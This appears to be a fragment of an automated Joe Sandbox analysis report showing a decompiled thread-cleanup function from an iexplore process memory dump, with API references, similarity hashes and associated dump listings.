  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
  • Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
  • Opcode Fuzzy Hash: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
  • Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}






0x72b21f34
0x72b21f39
0x72b21f3b
0x72b21f3f
0x72b21f47
0x72b21f47
0x72b21f4d
0x72b21f52
0x72b21f5a
0x72b21f6d
0x72b21f77
0x72b21f77
0x72b21f83
0x72b21f83
0x00000000
0x72b21f8a
0x72b21f92

APIs
  • WaitForSingleObject.KERNEL32(?,00001388,?,00000000,?,72B23101,00000000,?), ref: 72B21F62
  • TerminateThread.KERNEL32(?,00000000,?,72B23101,00000000,?), ref: 72B21F77
  • CloseHandle.KERNEL32(?,?,72B23101,00000000,?), ref: 72B21F83
  • LocalFree.KERNEL32(?,?,00000000,?,72B23101,00000000,?), ref: 72B21F8A
    • Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
    • Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
    • Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
  • Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95
Uniqueness

Uniqueness Score: -1.00%